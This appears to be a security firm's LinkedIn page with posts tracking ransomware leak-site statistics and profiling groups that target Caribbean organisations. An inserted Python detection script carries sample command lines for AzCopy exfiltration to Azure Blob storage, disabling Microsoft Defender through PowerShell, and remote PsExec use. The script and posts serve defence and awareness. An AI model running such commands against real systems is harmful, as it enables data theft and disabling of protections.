Here are the Top 10 Ransomware Attack/Leak Publication Stats for October 2024.

October 2024 saw a significant uptick in leak listings and publications with 516 listings/leak publications by 40 groups, up from 357 listings/publications by 34 groups in September 2024. For the 4th month in a row, the RansomHub (RaaS) group has again been the top threat group with 85 listings/publications for October.

It should be noted that these listings and publications are victims who have not paid the ransoms. Victims who have paid are not listed and no public record is kept.

Interestingly enough, even after a major interruption by Law Enforcement at least 3 times this year, LockBit remains (somewhat) active with 3 listings/publications for October. New group Sarcoma listed 25 victims for October, one of which operates within the Caribbean. New group Playboy Locker listed one victim (government agency) but then decided to sell their source code and close operations.

5 new groups spotted in October 2024:
- Sarcoma (25 listings)
- Nitrogen (22 listings)
- Interlock (4 listings)
- Orca (3 listings)
- Playboy Locker (1 listing)

Full stats in the comments section.

#ransomwareattacks #dataleaks #ransomhub #lockbit
Computer Forensics and Security Institute (CFSI)
Computer and Network Security
Chaguanas, Chaguanas 799 followers
Penetration Testing. Vulnerability Assessments. Digital Forensics. Purple Teaming. Cybersec Consultancy and Training.
About us
CFSI offers advanced Cyber Security services including Vulnerability Assessment, Penetration Testing, Digital Forensics and Network Security Training.
- Website: http://www.cfsi.co
- Industry: Computer and Network Security
- Company size: 2-10 employees
- Headquarters: Chaguanas, Chaguanas
- Type: Educational
- Founded: 2011
- Specialties: Penetration Testing, Digital Forensics, CyberSec Training, Certified Ethical Hacker Training, CCNA Training, Vulnerability Assessment, Incident Response Training, Certified EC-Council Instructor, and Authorized Training Centre
Updates
-
🚨🚨 The Caribbean has seen 5 major ransomware/data leak listings in the past 2 months. 🚨🚨

Ransomware Groups/Threat Actors:
- BianLian
- BlackLock/El Dorado
- Sarcoma
- Pryx
- Lynx

Sectors Affected:
- Insurance
- Retail and Distribution
- Banking and Finance
- Government
- IT Service Provider

Countries Affected:
- Jamaica
- Barbados
- Trinidad & Tobago
- Bermuda
- Aruba
- Bahamas

#ransomwareattacks #dataleaks #darkweb #caribbean #aruba #barbabos #bermuda #bahamas #jamaica #trinidadandtobago
-
🚨 BlackLock (Formerly El Dorado) Ransomware group 🚨 has listed a large organization from Aruba operating in the Retail and Distribution (Food) sector on their Dark Web leak site.

El Dorado Ransomware Group additional info:
- Mainly targets Windows and VMware ESXi systems but is also known to affect Linux systems.
- First seen: early 2024.
- Type: RaaS (Ransomware-as-a-Service).
- El Dorado rebranded into BlackLock in September 2024.
- Possible past affiliation with MetaEncryptor and LostTrust groups.
- Victims listed as at October 18th 2024: 38
- Extortion type: Double (encryption and data leak).
- Industries/sectors attacked: Healthcare, Retail, Distribution, Food and Beverage, Manufacturing, Legal, Construction, Government, IT and more.

#ransomwareattack #eldorado #blacklock #aruba #caribbean
-
🚨 New Ransomware Group Sarcoma 🚨 has listed a company from Bermuda operating within the Finance and Banking sector as a victim on their Dark Web leak site. A countdown timer with approximately 7 days is currently running.

Sarcoma Ransomware Group info:
- First seen: October 2024
- Victims listed as at October 18th, 2024: 33
- Extortion type: Triple (Direct extortion, encryption and data leak).
- Information on the Sarcoma "About Us" page on the dark web states "Our mission is to show the world how important it is to keep data safe. If you see your company on our website, it means that security was low. We invite access brokers, interested parties, aggrieved employees of companies to co-operate. Together we can be stronger and richer."
- Industries/sectors attacked: IT and Cyber security, Banking and Finance, Insurance, Construction, Retail and Wholesale and more.

#ransomwareattack #caribbean #Bermuda
-
Here are the top 10 Ransomware attack/leak publication stats for September 2024. There were approximately 357 publications by 37 monitored groups. Ransomhub is again at the top for yet another month with increased activity. Full stats in the comments. #ransomwareattacks #ransomhub
-
🇧🇧 Pryx Ransomware threat actor allegedly breaches Barbados Government 🇧🇧

Pryx has listed for sale a dump titled "Tax and Tourism fees service dump (230 GB)" on its dark web leak site. See screenshots for details. PII listed allegedly includes Passports and National ID numbers. Five sample files have also been uploaded (which have not been downloaded or viewed).

Additional info about Pryx:
- First seen: Between April - July 2024
- Has stated the following on their dark web leak page: "Pryx is definitely not a ransomware group. Pryx is a cybercriminal or threat actor, whatever you want to call it. Pryx might soon get into hacktivism, bcuz why not."
- Victims listed as at October 1st 2024: 9
- Extortion type: Double (encryption and data leak).
- Extortion amounts: up to $10 million.
- Industries/sectors attacked: Government and education.

#dataleak #barbados #caricom #pryx
-
🚨🚨 Ransomware Attack/Data Leak on Caribbean Insurance Company 🚨🚨

The BianLian Ransomware group published a post on their dark web leak site about an alleged data leak on an insurance company operating within several Caribbean islands including Jamaica, the Bahamas and Trinidad & Tobago. The data volume is listed at 3.5 TB and the data description lists clients' and employees' PII (Personally Identifiable Data) and accounting and policy data.

About the BianLian Ransomware group:
- First dark web leak post made in August 2022.
- Has leaked the data of over 450 victims in the past 2 years.
- Target sectors: Health and Medical, Financial, Construction, Manufacturing, Critical Infrastructure, Robotics, Food, Aviation and more.
- Known RaaS (Ransomware-as-a-Service) group.
- Possible association with Makop Ransomware group.
- Known for extortion without encryption, meaning that they do not encrypt victim files but instead focus on extortion via data leak if ransom is not paid.
- Has exfiltrated well over 8TB of data from victims in the past 2 years.
- Recently discovered to have been using Microsoft Storage Explorer and AzCopy tools to exfiltrate stolen data which is transferred to Microsoft Storage Blob containers for storage. (Most likely as Microsoft services are less likely to be blocked).
- Known to gain access via RDP (Remote Desktop Protocol), phishing, ProxyShell and VPN exploitation and also via Access Brokers followed by the planting of backdoors and remote access software.
- Uses PowerShell and Command Shell to disable and evade anti-virus and anti-malware protection (specifically Microsoft Defender).
- Uses popular tools for network scanning and enumeration including Advanced Port Scanner, SharpShares and PingCastle.
- Uses PsExec with compromised credentials for Lateral Movement.

#ransomwareattack #dataleak #bianlian #trinidad #jamaica #bahamas
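Detection logic for three of the behaviours listed in the BianLian post above, as an added example that is not part of the original post: it flags process command lines showing an AzCopy upload to Azure Blob storage, Defender settings being disabled through PowerShell, and PsExec run against a remote host. The sample command lines, the storage account name, the host and account names and the rule names are constructed for illustration.

```python
import re

# Constructed process-creation command lines (illustrative, not from the post).
SAMPLE_EVENTS = [
    r'azcopy.exe copy "D:\Finance" "https://exampleacct.blob.core.windows.net/c1?sv=PLACEHOLDER" --recursive',
    r'powershell.exe -c Set-MpPreference -DisableRealtimeMonitoring $true',
    r'PsExec.exe \\HOST02 -u corp\svc_backup -p PLACEHOLDER cmd.exe',
    r'azcopy.exe copy "https://exampleacct.blob.core.windows.net/c1/tool.zip" "C:\Temp\tool.zip"',
    r'powershell.exe -c Get-MpPreference',
]

TOKEN = re.compile(r'"[^"]*"|\S+')  # quoted argument or bare word
BLOB = re.compile(r'^https://[a-z0-9]{3,24}\.blob\.core\.windows\.net/', re.I)
DEFENDER_OFF = re.compile(r'Set-MpPreference\b.*-Disable\w+\s+(\$true|1)\b', re.I)
PSEXEC_REMOTE = re.compile(r'\bpsexec(64)?(\.exe)?\s(.*\s)?\\\\[\w.-]+', re.I)


def azcopy_upload(cmdline):
    """True when AzCopy copies or syncs a non-URL source to a Blob endpoint."""
    toks = [t.strip('"') for t in TOKEN.findall(cmdline)]
    if len(toks) < 4 or not re.search(r'azcopy(\.exe)?$', toks[0], re.I):
        return False
    if toks[1].lower() not in ('copy', 'sync'):
        return False
    # AzCopy syntax is "<verb> <source> <destination> [flags]".
    positional = [t for t in toks[2:] if not t.startswith('--')]
    if len(positional) < 2:
        return False
    src, dst = positional[:2]
    local_src = not src.lower().startswith(('http://', 'https://'))
    return local_src and bool(BLOB.match(dst))


def classify(cmdline):
    """Return the names of every rule the command line matches."""
    hits = []
    if azcopy_upload(cmdline):
        hits.append('azcopy_blob_upload')
    if DEFENDER_OFF.search(cmdline):
        hits.append('defender_tamper')
    if PSEXEC_REMOTE.search(cmdline):
        hits.append('psexec_remote')
    return hits


if __name__ == '__main__':
    for event in SAMPLE_EVENTS:
        print(classify(event) or ['no_match'], '<-', event)
```

Because AzCopy and PsExec are also legitimate administration tools, hits from rules like these are best triaged against the hosts and accounts expected to run them.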
-
New Ransomware Group Observed - Part 6. 🚨 Lynx Ransomware Group. 🚨

This group has allegedly breached a large organization which operates in several Caribbean islands (including 🇧🇧 Barbados, 🇯🇲 Jamaica and 🇹🇹 Trinidad) and Latin American countries. (The name of the company will not be divulged publicly or privately as this post is solely for awareness purposes). Though only in operation for 2 months (under this group) they do appear to be experienced and highly-organized with a focus on larger, profitable targets.

- Type: Ransomware-as-a-Service (RaaS)
- Possible rebranding of/association with Inc Ransomware (RaaS) group.
- Noticeably active since July 2024
- Encryption Type: AES
- Sectors of Interest: Engineering, Construction, Manufacturing, Technology and Finance
- Dark web/leak site victim count: 24.
- Known for double extortion. (Encryption of systems and leaking of data).
- Lists company income on each leak post. Victims are usually large profitable organizations with income ranging from $5 Million to $700 Million.

#ransomwareattacks #newransomwaregroup
-
Here are the Ransomware group stats for August 2024. A significant jump in publications by new Ransomware-as-a-Service (RaaS) group Ransomhub which could be attracting Lockbit affiliates. I counted approximately 420 listings by 37 groups for August. Keep in mind these listings only show the companies which did Not pay the ransoms. See the full list in the comments section. #ransomwareattacks